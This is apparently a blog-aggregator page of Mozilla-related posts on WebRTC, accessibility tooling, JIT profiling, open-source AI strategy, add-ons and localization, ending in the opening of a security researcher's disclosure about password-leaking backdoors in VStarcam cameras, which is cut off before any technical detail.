Advancing WebRTC: Firefox WebRTC 2025
In an increasingly siloed internet landscape, WebRTC directly connects human voices and faces. The technology powers Audio/Video calling, conferencing, live streaming, telehealth, and more. We strive to make Firefox the client that best serves humans during those experiences.
Expanding Simulcast Support
Simulcast allows a single WebRTC video to be simultaneously transmitted at differing qualities. Some codecs can efficiently encode the streams simultaneously. Each viewer can receive the video stream that gives them the best experience for their viewing situation, whether that be using a phone with a small screen and shaky cellular link, or a desktop with a large screen and wired broadband connection. While Firefox has supported a more limited set of simulcast scenarios for some time, this year we put a lot of effort into making sure that even more of our users using even more services can get those great experiences.
We have added simulcast capabilities for H.264 and AV1. This, along with adding support for the dependency descriptor header extension (including its use with H.264), increases the number of services that can take advantage of simulcast while using Firefox.
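To make the layer-selection idea concrete, here is a toy sketch in Python. This is an illustration of the concept only, not Firefox or SFU code; the rid names and bitrates are invented, loosely mirroring the sendEncodings a page would pass to RTCPeerConnection.addTransceiver in JavaScript.

```python
# Toy sketch of how a forwarding server might pick a simulcast layer
# for a viewer. The encodings below are invented for illustration.

ENCODINGS = [
    {"rid": "low",  "maxBitrate": 150_000},   # small screens, weak links
    {"rid": "mid",  "maxBitrate": 500_000},
    {"rid": "high", "maxBitrate": 1_500_000},  # big screens, wired broadband
]

def pick_layer(available_bps):
    """Return the rid of the best layer that fits the viewer's bandwidth."""
    best = ENCODINGS[0]  # always fall back to the lowest layer
    for enc in ENCODINGS:
        if enc["maxBitrate"] <= available_bps:
            best = enc
    return best["rid"]

print(pick_layer(200_000))    # phone on a shaky cellular link -> low
print(pick_layer(5_000_000))  # desktop on wired broadband -> high
```

The same sender encodes all three layers once; each receiver simply gets the layer that fits, which is the whole point of simulcast.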
Codec Support
Dovetailing with the simulcast support, we now support more codecs doing more things on more platforms! This includes turning on AV1 support by default and adding temporal layer support for H.264. Additionally, a number of behind-the-scenes changes were made. For our users, this means a more uniform experience across devices.
Media Capture
We have improved camera resolution and frame-rate adaptation on all platforms, as well as improved, OS-integrated screen capture on macOS. Users will have a smoother experience when joining calls, with streams that are better suited to their devices. This means smoother video and a consistent aspect ratio.
DataChannel
Improving the reliability, performance, and compatibility of our DataChannel implementation has been a focus this year. DataChannels can now be used on workers, keeping data processing off the main thread. This was enabled by a major refactoring effort: migrating our implementation to dcsctp.
Web Compatibility
We targeted a number of areas where we could improve compatibility with the broad web of services that our users rely on.
- Bug 1329847: Implement RTCDegradationPreference related functions
- Bug 1894137: Implement RTCRtpEncodingParameters.codec
- Bug 1371391: Implement remaining mandatory fields in RTCIceCandidatePairStats
- Bug 1525241: Implement RTCCertificate.getFingerprints method
- Bug 1835077: Support RTCEncodedAudioFrameMetadata.contributingSources
- Bug 1972657: SendKeyFrameRequest Should Not Reject Based on Transceiver State
Summary
2025 has been an exciting and busy year for WebRTC in Firefox. We have broadly improved web compatibility throughout the WebRTC technology stack, and we are looking forward to another impactful year in 2026.
The Mozilla Blog: Mozilla welcomes Amy Keating as Chief Business Officer
Mozilla is pleased to announce that Amy Keating has joined Mozilla as Chief Business Officer (CBO).
In this role, Amy will work across the Mozilla family of organizations, and alongside other business leaders, including the Mozilla Corporation’s CBO Brad Smallwood — spanning products, companies, investments, grants, and new ventures — to help ensure we are not only advancing our mission but also financially sustainable and operationally rigorous. The core of this job: making investments that push the internet in a better direction.
Keating takes on this role at a pivotal moment for Mozilla and for the responsible technology ecosystem. As Mozilla pursues a new portfolio strategy centered on building an open, trustworthy alternative to today’s closed and concentrated AI ecosystem, the organization has embraced a double bottom line economic model: one that measures success through mission impact and commercial performance. Delivering on that model requires disciplined business leadership at the highest level.
“Mozilla’s mission has never been more urgent — but mission alone isn’t enough to bring about the change we want to see in the world,” said Mark Surman, President of the Mozilla Foundation. “To build real alternatives in AI and the web, we need to be commercially successful, sustainable, and able to invest at scale. Our double bottom line depends on it. Amy is a proven, visionary business leader who understands how to align values with viable, ambitious business strategy. She will help ensure Mozilla can grow, thrive, and influence the entire marketplace.”
This role is a return to Mozilla for Keating, who previously was Mozilla Corporation’s Chief Legal Officer. Keating has also served on the Boards of Mozilla Ventures and the Mozilla Foundation. Most recently, Keating held senior leadership roles at Glean and Planet Labs, and previously spent nearly a decade across Google and Twitter. She returns to Mozilla with 20 years of professional experience advising and operating in technology organizations. In these roles — and throughout her career — she has focused on building durable businesses grounded in openness, community, and long-term impact.
“Mozilla has always been creative, ambitious, and deeply rooted in community,” said Amy Keating. “I’m excited to return at a moment when the organization is bringing its mission and its assets together in new ways — and to help build the operational and business foundation that allows our teams and portfolio organizations to thrive.”
As Chief Business Officer, Amy brings an investment and growth lens to Mozilla, supporting Mozilla’s portfolio of mission-driven companies and nonprofits, identifying investments in new entities aligned with the organization’s strategy, and helping to strengthen Mozilla’s leadership creating an economic counterbalance to the players now dominating a closed AI ecosystem.
This work is critical not only to Mozilla’s own sustainability, but to its ability to influence markets and shape the future of AI and the web in the public interest.
“I’m here to move with speed and clarity,” said Keating, “and to think and act at the scale of our potential across the Mozilla Project.”
Read more here about Mozilla’s next era. Read here about Mozilla’s new CTO, Raffi Krikorian.
Eitan Isaacson: MacOS Accessibility with pyax

In our work on Firefox macOS accessibility we routinely run into highly nuanced bugs in our accessibility platform API. The tree structure, an object attribute, the sequence of events, or an event payload is just off enough that we see a pronounced difference in how an AT like VoiceOver behaves. When we compare our API against other browsers like Safari or Chrome, we notice small differences that have outsized user impacts.
In cases like that, we need to dive deep. Xcode’s Accessibility Inspector shows a limited subset of the API, but web engines implement a much larger set of attributes that are not shown in the inspector. This includes an advanced, undocumented text API. We also need a way to view and inspect events and their payloads so we can compare the sequence to other implementations.
Since we started getting serious about macOS accessibility in Firefox in 2019, we have cobbled together an ad hoc set of Swift and Python scripts to examine our work. It slowly coalesced and formalized into a Python client library for macOS accessibility called pyax.
Recently, I put some time into making pyax not just a Python library, but a nifty command line tool for quick and deep diagnostics. There are several sub commands I’ll introduce here. And I’ll leave the coolest for last, so hang on.
pyax tree
This very simply dumps the accessibility tree of the given application. But hold on, there are some useful flags you can use to drill down to the issue you are looking for:
--web
Only output the web view’s subtree. This is useful if you are troubleshooting a simple web page and don’t want to be troubled with the entire application.
--dom-id
Dump the subtree of the given DOM ID. This obviously is only relevant for web apps. It allows you to cut the noise and only look at the part of the page/app you care about.
--attribute
By default the tree dumper only shows you a handful of core attributes. Just enough to tell you a bit about the tree. You can include more obscure attributes by using this argument.
--all-attributes
Print all known attributes of each node.
--list-attributes
List all available attributes on each node in the tree. Sometimes you don’t even know what you are looking for, and this could help.
Implementation note: An app can provide an attribute without advertising its availability, so don’t rely on this alone.
--list-actions
List supported actions on each node.
--json
Output the tree in JSON format. This is useful with --all-attributes to capture and store a comprehensive state of the tree for comparison with other implementations or other deep dives.
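To make the attribute flags concrete, here is a toy sketch, in plain Python with no pyax required, of what an attribute-filtered tree dump conceptually does. The node shape and attribute names here are invented for illustration and are not pyax's real data model.

```python
# A toy accessibility tree: each node has some attributes and children.
TREE = {
    "AXRole": "AXWebArea",
    "AXDOMIdentifier": "main",
    "children": [
        {"AXRole": "AXButton", "AXDOMIdentifier": "ok", "children": []},
    ],
}

CORE = ["AXRole"]  # the handful of core attributes shown by default

def dump(node, extra=(), depth=0, out=None):
    """Dump the tree, showing core attributes plus any requested extras,
    roughly like `pyax tree --attribute` conceptually behaves."""
    if out is None:
        out = []
    attrs = {k: node[k] for k in [*CORE, *extra] if k in node}
    out.append("  " * depth + str(attrs))
    for child in node["children"]:
        dump(child, extra, depth + 1, out)
    return out

for line in dump(TREE, extra=["AXDOMIdentifier"]):
    print(line)
```

The real tool queries live AX API objects rather than dictionaries, but the filter-then-recurse shape is the same idea.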
pyax observe
This is a simple event logger that allows you to output events and their payloads. It takes most of the arguments above, like --attribute and --list-actions.
In addition:
--event
Observe specific events. You can provide this argument multiple times for more than one event.
--print-info
Print the bundled event info.
pyax inspect
For visually inclined users, this command allows them to hover over the object of interest, click, and get a full report of its attributes, subtree, or any other useful information. It takes the same arguments as above, and more! Check out --help.
Getting pyax
Do pip install pyax[highlight] and it’s all yours. Please contribute with code, documentation, or good vibes (keep your vibes separate from the code).
Matthew Gaudet: Non-Traditional Profiling
Also known as “you can just put whatever you want in a jitdump you know?”
When you profile JIT code, you have to tell a profiler what on earth is going on in those JIT bytes you wrote out. Otherwise the profiler will shrug and just give you some addresses.
There’s a decent and fairly common format called jitdump, which originates in perf but has become used in more places. The basic thrust of the parts we care about is: you have names associated with ranges.
Of course, the basic range you’d expect to name is “function foo() was compiled to bytes 0x1000-0x1400”.
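That "names associated with ranges" idea boils down to an interval lookup. Here is a minimal Python sketch of the lookup a profiler performs; the actual jitdump record layout is more involved, and the addresses and names below are invented.

```python
import bisect

# Sorted, non-overlapping (start, end, name) records, conceptually like
# code-load entries in a jitdump file. Addresses are made up.
RANGES = [
    (0x1000, 0x1400, "function foo()"),
    (0x1400, 0x1600, "IC: GetProp"),
    (0x2000, 0x2800, "function bar()"),
]
STARTS = [r[0] for r in RANGES]

def symbolize(addr):
    """Map a sampled PC to a name, or '??' if it falls outside JIT code."""
    i = bisect.bisect_right(STARTS, addr) - 1
    if i >= 0:
        start, end, name = RANGES[i]
        if start <= addr < end:
            return name
    return "??"

print(symbolize(0x1234))  # inside foo -> function foo()
print(symbolize(0x1800))  # gap between records -> ??
```

Without these records the profiler has nothing to look up, which is why unnamed JIT samples show up as bare addresses.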
Suppose you get that working. You might get a profile that looks like this one.
This profile is pretty useful: You can see from the flame chart what execution tier created the code being executed, you can see code from inline caches etc.
Before I left for Christmas break though, I had a thought: to a first approximation, both optimized and baseline code generation is fairly ‘template’ style. That is to say, we emit (relatively) stable chunks of code for each of our bytecodes, in the case of our baseline compiler, or for each of our intermediate-representation nodes, in the case of Ion, our top-tier compiler.
What if we looked more closely at that?
Some of our code is already tagged with AutoCreatedBy, an RAII class which pushes a creator string on and pops it off when it goes out of scope. I went through and added AutoCreatedBy to each of the LIR ops’ codegen methods (e.g. CodeGenerator::visit*). Then I rigged up our jitdump support so that instead of dumping functions, we dump the function name plus the whole chain of AutoCreatedBy as the ‘function name’ for the sequence of instructions generated while the AutoCreatedBy was live.
That gets us this profile.
While it doesn’t look that different, the key is in how the frames are named. Of course, the vast majority of frames are just the name of the call instruction... that only makes sense. However, you can see some interesting things if you invert the call tree.
For example, for a single self-hosted function we spend 1.9% of the profiled time in ‘visitHasShape’, which is basically:
masm.loadObjShapeUnsafe(obj, output);
masm.cmpPtrSet(Assembler::Equal, output, ImmGCPtr(ins->mir()->shape()), output);
Which is not particularly complicated.
Ok so that proves out the value. What if we just say... hmmm. I actually want to aggregate across all compilation; ignore the function name, just tell me the compilation path here.
Woah. Ok, now we’ve got something quite different, if really hard to interpret.
Even more interesting (easier to interpret) is the inverted call tree:
So across the whole program, we’re spending basically 5% of the time doing guardShape. I think that’s a super interesting slicing of the data.
Is it actionable? I don’t know yet. I haven’t opened any bugs really on this yet; a lot of the highlighted code is stuff where it’s not clear that there is a faster way to do what’s being done, outside of engine architectural innovation.
The reason to write this blog post is basically to share that... man, we can slice-and-dice our programs in so many interesting ways. I’m sure there’s more to think of. For example, not shown here was an experiment: I added AutoCreatedBy inside a single macro-assembler method set (around barriers) to try and see if I could actually see GC barrier cost (it’s low on the benchmarks I checked).
So yeah. You can just... put stuff in your JIT dump file.
Edited to Add: I should mention this code is nowhere. Given I don’t entirely know how actionable this ends up being, and the code quality is subpar, I haven’t even pushed this code. Think of this as an inspiration, not a feature announcement.
The Mozilla Blog: Owners, not renters: Mozilla’s open source AI strategy
The future of intelligence is being set right now, and the path we’re on leads somewhere I don’t want to go. We’re drifting toward a world where intelligence is something you rent — where your ability to reason, create, and decide flows through systems you don’t control, can’t inspect, and didn’t shape. In that world, the landlord can change the terms anytime, and you have no recourse but to accept what you’re given.
I think we can do better. Making that happen is now central to what Mozilla is doing.
What we did for the web
Twenty-five years ago, Microsoft Internet Explorer controlled 95% of the browser market, which meant Microsoft controlled how most people experienced the internet and who could build what on what terms. Mozilla was born to change this, and Firefox succeeded beyond what most people thought possible — dropping Internet Explorer’s market share to 55% in just a few years and ushering in the Web 2.0 era. The result was a fundamentally different internet. It was faster and richer for everyday users, and for developers it was a launchpad for open standards and open source that decentralized control over the core technologies of the web.
There’s a reason the browser is called a “user agent.” It was designed to be on your side — blocking ads, protecting your privacy, giving you choices that the sites you visited never would have offered on their own. That was the first fight, and we held the line for the open web even as social networks and mobile platforms became walled gardens.
Now AI is becoming the new intermediary. It’s what I’ve started calling “Layer 8” — the agentic layer that mediates between you and everything else on the internet. These systems will negotiate on our behalf, filter our information, shape our recommendations, and increasingly determine how we interact with the entire digital world.
The question we have to ask is straightforward: Whose side will your new user agent be on?
Why closed systems are winning (for now)
We need to be honest about the current state of play: Closed AI systems are winning today because they are genuinely easier to use. If you’re a developer with an idea you want to test, you can have a working prototype in minutes using a single API call to one of the major providers. GPUs, models, hosting, guardrails, monitoring, billing — it all comes bundled together in a package that just works. I understand the appeal firsthand, because I’ve made the same choice myself on late-night side projects when I just wanted the fastest path from an idea in my head to something I could actually play with.
The open-source AI ecosystem is a different story. It’s powerful and advancing rapidly, but it’s also deeply fragmented — models live in one repository, tooling in another, and the pieces you need for evaluation, orchestration, guardrails, memory, and data pipelines are scattered across dozens of independent projects with different assumptions and interfaces. Each component is improving at remarkable speed, but they rarely integrate smoothly out of the box, and assembling a production-ready stack requires expertise and time that most teams simply don’t have to spare. This is the core challenge we face, and it’s important to name it clearly: What we’re dealing with isn’t a values problem where developers are choosing convenience over principle. It’s a developer experience problem. And developer experience problems can be solved.
The ground is already shifting
We’ve watched this dynamic play out before and the history is instructive. In the early days of the personal computer, open systems were rough, inconsistent, and difficult to use, while closed platforms offered polish and simplicity that made them look inevitable. Openness won anyway — not because users cared about principles, but because open systems unlocked experimentation and scale that closed alternatives couldn’t match. The same pattern repeated on the web, where closed portals like AOL and CompuServe dominated the early landscape before open standards outpaced them through sheer flexibility and the compounding benefits of broad participation.
AI has the potential to follow the same path — but only if someone builds it. And several shifts are already reshaping the landscape:
- Small models have gotten remarkably good. At 1 to 8 billion parameters, tuned for specific tasks, they run on hardware that organizations already own;
- The economics are changing too. As enterprises feel the constraints of closed dependencies, self-hosting is starting to look like sound business rather than ideological commitment (companies like Pinterest have attributed millions of dollars in savings to migrating to open-source AI infrastructure);
- Governments want control over their supply chain. Governments are becoming increasingly unwilling to depend on foreign platforms for capabilities they consider strategically important, driving demand for sovereign systems; and,
- Consumer expectations keep rising. People want AI that responds instantly, understands their context, and works across their tools without locking them into a single platform.
The capability gap that once justified the dominance of closed systems is closing fast. What remains is a gap in usability and integration. The lesson I take from history is that openness doesn’t win by being more principled than the alternatives. Openness wins when it becomes the better deal — cheaper, more capable, and just as easy to use.
Where the cracks are forming
If openness is going to win, it won’t happen everywhere at once. It will happen at specific tipping points — places where the defaults haven’t yet hardened, where a well-timed push can change what becomes normal. We see four.
The first is developer experience. Developers are the ones who actually build the future — every default they set, every stack they choose, every dependency they adopt shapes what becomes normal for everyone else. Right now, the fastest path runs through closed APIs, and that’s where most of the building is happening. But developers don’t want to be locked in any more than users do. Give them open tools that work as well as the closed ones, and they’ll build the open ecosystem themselves.
The second is data. For a decade, the assumption has been that data is free to scrape — that the web is a commons to be harvested without asking. That norm is breaking, and not a moment too soon. The people and communities who create valuable data deserve a say in how it’s used and a share in the value it creates. We’re moving toward a world of licensed, provenance-based, permissioned data. The infrastructure for that transition is still being built, which means there’s still a chance to build it right.
The third is models. The dominant architecture today favors only the biggest labs, because only they can afford to train massive dense transformers. But the edges are accelerating: small models, mixtures of experts, domain-specific models, multilingual models. As these approaches mature, the ability to create and customize intelligence spreads to communities, companies, and countries that were previously locked out.
The fourth is compute. This remains the choke point. Access to specialized hardware still determines who can train and deploy at scale. More doors need to open — through distributed compute, federated approaches, sovereign clouds, idle GPUs finding productive use.
What an open stack could look like
Today’s dominant AI platforms are building vertically integrated stacks: closed applications on top of closed models trained on closed data, running on closed compute. Each layer reinforces the next — data improves models, models improve applications, applications generate more data that only the platform can use. It’s a powerful flywheel. If it continues unchallenged, we arrive at an AI era equivalent to AOL, except far more centralized. You don’t build on the platform; you build inside it.
There’s another path. The combination of Linux, Apache, MySQL, and PHP (the LAMP stack) won because it became easier to use than the proprietary alternatives, and because it let developers build things that no commercial platform would have prioritized. The web we have today exists because that stack existed.
We think AI can follow the same pattern. Not one stack controlled by any single party, but many stacks shaped by the communities, countries, and companies that use them:
- Open developer interfaces at the top. SDKs, guardrails, workflows, and orchestration that don’t lock you into a single vendor;
- Open data standards underneath. Provenance, consent, and portability built in by default, so you know where your training data came from and who has rights to it;
- An open model ecosystem below that. Smaller, specialized, interchangeable models that you can inspect, tune to your values, and run where you need them; and
- Open compute infrastructure at the foundation. Distributed and federated hardware across cloud and edge, not routed through a handful of hyperscalers.
Pieces of this stack already exist — good ones, built by talented people. The task now is to fill in the gaps, connect what’s there, and make the whole thing as easy to use as the closed alternatives. That’s the work.
Why open source matters here
If you’ve followed Mozilla, you know the Manifesto. For almost 20 years, it’s guided what we build and how — not as an abstract ideal, but as a tool for making principled decisions every single day. Three of its principles are especially urgent in the age of AI:
- Human agency. In a world of AI agents, it’s more important than ever that technology lets people shape their own experiences — and protects privacy where it matters most;
- Decentralization and open source. An open, accessible internet depends on innovation and broad participation in how technology gets created and used. The success of open-source AI, built around transparent community practices, is critical to making this possible; and
- Balancing commercial and public benefit. The direction of AI is being set by commercial players. We need strong public-benefit players to create balance in the overall ecosystem.
Open-source AI is how these principles become real. It’s what makes plurality possible — many intelligences shaped by many communities, not one model to rule them all. It’s what makes sovereignty possible — owning your infrastructure rather than renting it. And it’s what keeps the door open for public-benefit alternatives to exist alongside commercial ones.
What we’ll do in 2026
The window to shape these defaults is still open, but it won’t stay open forever. Here’s where we’re putting our effort — not because we have all the answers, but because we think these are the places where openness can still reset the defaults before they harden.
Make open AI easier than closed. Mozilla.ai is building any-suite, a modular framework that integrates the scattered components of the open AI stack — model routing, evaluation, guardrails, memory, orchestration — into something coherent that developers can actually adopt without becoming infrastructure specialists. The goal is concrete: Getting started with open AI should feel as simple as making a single API call.
Shift the economics of data. The Mozilla Data Collective is building a marketplace for data that is properly licensed, clearly sourced, and aligned with the values of the communities it comes from. It gives developers access to high-quality training data while ensuring that the people and institutions who contribute that data have real agency and share in the economic value it creates.
Learn from real deployments. Strategy that isn’t grounded in practical experience is just speculation, so we’re deepening our engagement with governments and enterprises adopting sovereign, auditable AI systems. These engagements are the feedback loops that tell us where the stack breaks and where openness needs reinforcement.
Invest in the ecosystem. We’re not just building; we’re backing others who are building too. Mozilla Ventures is investing in open-source AI companies that align with these principles. Mozilla Foundation is funding researchers and projects through targeted grants. We can’t do everything ourselves, and we shouldn’t try. The goal is to put resources behind the people and teams already doing the work.
Show up for the community. The open-source AI ecosystem is vast, and it’s hard to know what’s working, what’s hype, and where the real momentum is building. We want to be useful here. We’re launching a newsletter to track what’s actually happening in open AI. We’re running meetups and hackathons to bring builders together. We’re fielding developer surveys to understand what people actually need. And at MozFest this year, we’re adding a dedicated developer track focused on open-source AI. If you’re doing important work in this space, we want to help it find the people who need to see it.
Are you in?
Mozilla is one piece of a much larger movement, and we have no interest in trying to own or control it — we just want to help it succeed. There’s a growing community of people who believe the open internet is still worth defending and who are working to ensure that AI develops along a different path than the one the largest platforms have laid out. Not everyone in that community uses the same language or builds exactly the same things, but something like a shared purpose is emerging. Mozilla sees itself as part of that effort.
We kept the web open not by asking anyone’s permission, but by building something that worked better than the alternatives. We’re ready to do that again.
So: Are you in?
If you’re a developer building toward an open source AI future, we want to work with you. If you’re a researcher, investor, policymaker, or founder aligned with these goals, let’s talk. If you’re at a company that wants to build with us rather than against us, the door is open. Open alternatives have to exist — that keeps everyone honest.
The future of intelligence is being set now. The question is whether you’ll own it, or rent it.
We’re launching a newsletter to track what’s happening in open-source AI — what’s working, what’s hype, and where the real momentum is building. Sign up here to follow along as we build.
Read more here about our emerging strategy, and how we’re rewiring Mozilla for the era of AI.
Firefox Add-on Reviews: 2025 Staff Pick Add-ons
While nearly half of all Firefox users have installed an add-on, it’s safe to say nearly all Firefox staffers use add-ons. I polled a few of my peers and here are some of our staff favorite add-ons of 2025…
Falling Snow Animated Theme
Enjoy the soothing mood of Falling Snow Animated Theme. This motion-animated dark theme turns Firefox into a calm wintry night as snowflakes cascade around the corners of your browser.
Privacy Badger
The flagship anti-tracking extension from privacy proponents at the Electronic Frontier Foundation, Privacy Badger is built to look for a certain set of actions that indicate a web page is trying to secretly track you.
Zero set up required. Just install Privacy Badger and it will automatically search for third-party cookies, HTML5 local storage “supercookies,” canvas fingerprinting, and other sneaky tracking methods.
Adaptive Tab Bar Color
Turn Firefox into an internet chameleon. Adaptive Tab Bar Color changes the colors of Firefox to match whatever website you’re visiting.
It’s beautifully simple and sublime. No setup required, but you’re free to make subtle adjustments to color contrast patterns and assign specific colors for websites.
Rainy Spring Sakura by MaDonna
Created by MaDonna, one of the most prolific theme designers in the Firefox community, Rainy Spring Sakura offers a bucolic mix of calming colors that we love.
It’s like instant Zen mode for Firefox.
Return YouTube Dislike
Do you like the Dislike? YouTube removed the thumbs-down display, but fortunately Return YouTube Dislike came along to restore our view into the sometimes brutal truth of audience sentiment.
Other Firefox users seem to agree…
“Does exactly what the name suggests. Can’t see myself without this extension. Seriously, bad move on YouTube for removing such a vital tool.”
Firefox user OFG
“i have never smashed 5 stars faster.”
Firefox user 12918016
Return YouTube Dislike re-enables a beloved feature.
LeechBlock NG
Block time-wasting websites with LeechBlock NG — easily one of our staff-favorite productivity tools.
Lots of customization features help you stay focused and free from websites that have a way of dragging you down. Key features:
- Block entire websites or just portions (e.g. allow YouTube video pages but block the homepage)
- Block websites based on time of day, day of the week, or both
- Time limit customization (e.g. only 1 hour of Reddit per day)
DarkSpaceBlue
Drift through serene outer space as you browse the web. DarkSpaceBlue celebrates the infinite wonder of life among the stars.
LanguageTool – Grammar and Spell Checker
Improve your prose anywhere you write on the web. LanguageTool – Grammar and Spell Checker will make you a better writer in 25+ languages.
Much more than a basic spell checker, this privacy-centric writing aid is packed with great features:
- Offers alternate phrasing for brevity and clarity
- Recognizes common misuses of similar sounding words (e.g. there/their, your/you’re)
- Works with all web-based email and social media
- Provides synonyms for overused words
LanguageTool can help with subtle syntax improvements.
Sink It for Reddit!
Imagine a more focused and free feeling Reddit — that’s Sink It for Reddit!
Some of our staff-favorite features include:
- Custom content muting (e.g. ad blocking, remove app install and login prompts)
- Color-coded comments
- Streamlined navigation
- Adaptive dark mode
Sushi Nori
Turns out we have quite a few sushi fans at Firefox. We celebrate our love of sushi with the savory theme Sushi Nori.
Mozilla Localization (L10N): Mozilla Localization in 2025
As is tradition, we’re wrapping up 2025 for Mozilla’s localization efforts and offering a sneak peek at what’s in store for 2026 (you can find last year’s blog post here).
Pontoon’s metrics in 2025 show a stable picture for both new sign-ups and monthly active users. While we always hope to see signs of strong growth, this flat trend is a positive achievement when viewed against the challenges surrounding community involvement in Open Source, even beyond Mozilla. Thank you to everyone actively participating on Pontoon, Matrix, and elsewhere for making Mozilla localization such an open and welcoming community.
- 30 projects and 469 locales (+100 compared to 2024) set up in Pontoon.
- 5,019 new user registrations
- 1,190 active users submitting at least one translation, averaging 233 users per month (+5% Year-over-Year)
- 551,378 submitted translations (+18% YoY)
- 472,195 approved translations (+22% YoY)
- 13,002 new strings to translate (-38% YoY).
The number of strings added has decreased significantly overall, but not for Firefox, where the number of new strings was 60% higher than in 2024 (check out the increase of Fluent strings alone). That is not surprising, given the amount of new features (selectable profiles, unified trust panel, backup) and the upcoming settings redesign.
As in 2024, the relentless growth in the number of locales is driven by Common Voice, which now has 422 locales enabled in Pontoon (+33%).
Before we move forward, thank you to all the volunteers who contributed their time, passion, and expertise to Mozilla’s localization over the last 12 months — or plan to do so in 2026. There is always space for new contributors!
Pontoon Development
A significant part of the work on Pontoon in 2025 isn’t immediately visible to users, but it lays the groundwork for improvements that will start showing up in 2026.
One of the biggest efforts was switching to a new data model to represent all strings across all supported formats. Pontoon currently needs to handle around ten different formats, as transparently as possible for localizers, and this change is a step to reduce complexity and technical debt. As a concrete outcome, we can now support proper pluralization in Android projects, and we landed the first string using this model in Firefox 146. This removes long-standing UX limitations (no more Bookmarks saved: %1$s instead of %1$s bookmarks saved) and allows languages to provide more natural-sounding translations.
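For illustration, proper Android pluralization for the example above could look like this (a hypothetical resource name, not the actual string that landed in Firefox 146):

```xml
<plurals name="bookmarks_saved">
    <!-- Each language provides only the plural categories it needs -->
    <item quantity="one">Bookmark saved</item>
    <item quantity="other">%1$s bookmarks saved</item>
</plurals>
```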
In parallel, we continued investing in a unified localization library, moz-l10n, with the goal of having a centralized, well-maintained place to handle parsing and serialization across formats in both JavaScript and Python. This work is essential to keep Pontoon maintainable as we add support for new technologies and workflows.
Pontoon as a project remains very active. In 2025 alone, Pontoon saw more than 200 commits from over 20 contributors, not including work happening in external libraries such as moz-l10n.
Finally, we’ve been improving API support, another area that is largely invisible to end users. We moved away from GraphQL and migrated to Django REST, and we’re actively working toward feature parity with Transvision to better support automation and integrations.
Community
Our main achievement in 2025 was organizing a pilot in-person event in Berlin, reconnecting localizers from around Europe after a long hiatus. Fourteen volunteers from 11 locales spent a weekend together at the Mozilla Berlin office, sharing ideas, discussing challenges, and deepening relationships that had previously existed only online. For many attendees, this was the first time they met fellow contributors they had collaborated with for years, and the energy and motivation that came out of those days clearly showed the value of human connection in sustaining our global community.
This doesn’t mean we stopped exploring other ways to connect. For example, throughout the year we continued publishing Contributor Spotlights, showcasing the amazing work of individual volunteers from different parts of the world. These stories highlight not just what our contributors do, but who they are and why they make Mozilla’s localization work possible.
Internally, these spotlights have played an important role for advocating on behalf of the community. By bringing real voices and contributions to the forefront, we’ve helped reinforce the message that investing in people — not just tools — is essential to the long-term health of Mozilla’s localization ecosystem.
What’s coming in 2026
As we move into the new year, our focus will shift to exploring alternative deployment solutions. Our goal is to make Pontoon faster, more reliable, and better equipped to meet the needs of our users.
This excerpt comes from last year’s blog post, and while it took longer than expected, the good news is that we’re finally there. On January 6, we moved Pontoon to a new hosting platform. We expect this change to bring better reliability and performance, especially in response to peaks in bot traffic that have previously made Pontoon slow or unresponsive.
In parallel, we “silently” launched the Mozilla Language Portal, a unified hub that reflects Mozilla’s unique approach to localization while serving as a central resource for the global translator community. While we still plan to expand its content, the main infrastructure is now in place and publicly available, bringing together searchable translation memories, documentation, blog posts, and other resources to support knowledge-sharing and collaboration.
On the technology side, we plan to extend plural support to iOS projects and continue improving Pontoon’s translation memory support. These improvements aim to make it easier to reuse translations across projects and formats, for example by matching strings independently of placeholder syntax differences, and to translate Fluent strings with multiple values.
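As a toy sketch of what placeholder-independent matching could mean in practice (the function names are mine, not Pontoon’s; only the idea is taken from the paragraph above):

```python
import re

# Placeholders in a few common syntaxes: printf-style (%s, %d, %1$s)
# and Fluent/ICU-style ({ $count }, {count}).
PLACEHOLDER = re.compile(r"%\d+\$[sd]|%[sd]|\{\s*\$?\w+\s*\}")

def normalize(text):
    # Replace every placeholder with a generic token so that strings
    # differing only in placeholder syntax compare as equal.
    return PLACEHOLDER.sub("<ph>", text)

def tm_match(source, tm_entries):
    # Look up a translation memory entry, ignoring placeholder syntax.
    needle = normalize(source)
    for src, translation in tm_entries.items():
        if normalize(src) == needle:
            return translation
    return None

tm = {"%1$s bookmarks saved": "%1$s Lesezeichen gespeichert"}
# The Fluent-style variant matches despite different placeholder syntax:
print(tm_match("{ $count } bookmarks saved", tm))
```
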
We also aim to explore improvements in our machine translation options, evaluating how large language models could help with quality assessment or serve as alternative providers for MT suggestions.
Last but not least, we plan to keep investing in our community. While we don’t know yet what that will look like in practice, keep an eye on this blog for updates.
If you have any thoughts or ideas about this plan, let us know on Mastodon or Matrix!
Thank you!
As we look toward 2026, we’re grateful for the people who make Mozilla’s localization possible. Through shared effort and collaboration, we’ll continue breaking down barriers and building a web that works for everyone. Thank you for being part of this journey.
Wladimir Palant: Backdoors in VStarcam cameras
VStarcam is an important brand of cameras based on the PPPP protocol. Unlike the LookCam cameras I looked into earlier, these are often being positioned as security cameras. And they in fact do a few things better like… well, like having a mostly working authentication mechanism. In order to access the camera one has to know its administrator password.
So much for the theory. When I looked into the firmware of the cameras I discovered a surprising development: over the past years this protection has been systematically undermined. Various mechanisms have been added that leak the access password, and in several cases these cannot be explained as accidents. The overall tendency is clear: for some reason VStarcam really wants to have access to their customers’ passwords.
A reminder: “P2P” functionality based on the PPPP protocol means that these cameras will always communicate with and be accessible from the internet, even when located on a home network behind NAT. Short of installing a custom firmware this can only be addressed by configuring the network firewall to deny internet access.
Contents
- How to recognize affected cameras
- Downloading the firmware
- Caveats of this survey
- VStarcam’s authentication approach
- Endpoint protection
- Unauthenticated log access
- Explicit password leaking via logs
- Log uploading
- Password-leaking backdoor
- Establishing a timeline
- The impact
- Coordinated disclosure attempt
- Recommendations
How to recognize affected cameras
Not every VStarcam camera has “VStarcam” printed on the side. I have seen reports of VStarcam cameras being sold under the brand names Besder, MVPower, AOMG, OUSKI, and there are probably more.
Most cameras should be recognizable by the app used to manage them. Any camera managed by one of these apps should be a VStarcam camera: Eye4, EyeCloud, FEC Smart Home, HOTKam, O-KAM Pro, PnPCam, VeePai, VeeRecon, Veesky, VKAM, VsCam, VStarcam Ultra.
Downloading the firmware
VStarcam cameras have a mechanism to deliver firmware updates (LookCam cameras prove that this shouldn’t be taken for granted). The app managing the camera will request update information from an address like http://api4.eye4.cn:808/firmware/1.2.3.4/EN where 1.2.3.4 is the firmware version. If a firmware update is available the response will contain a download server and a download path. The app sends these to the device which then downloads and installs the updated firmware.
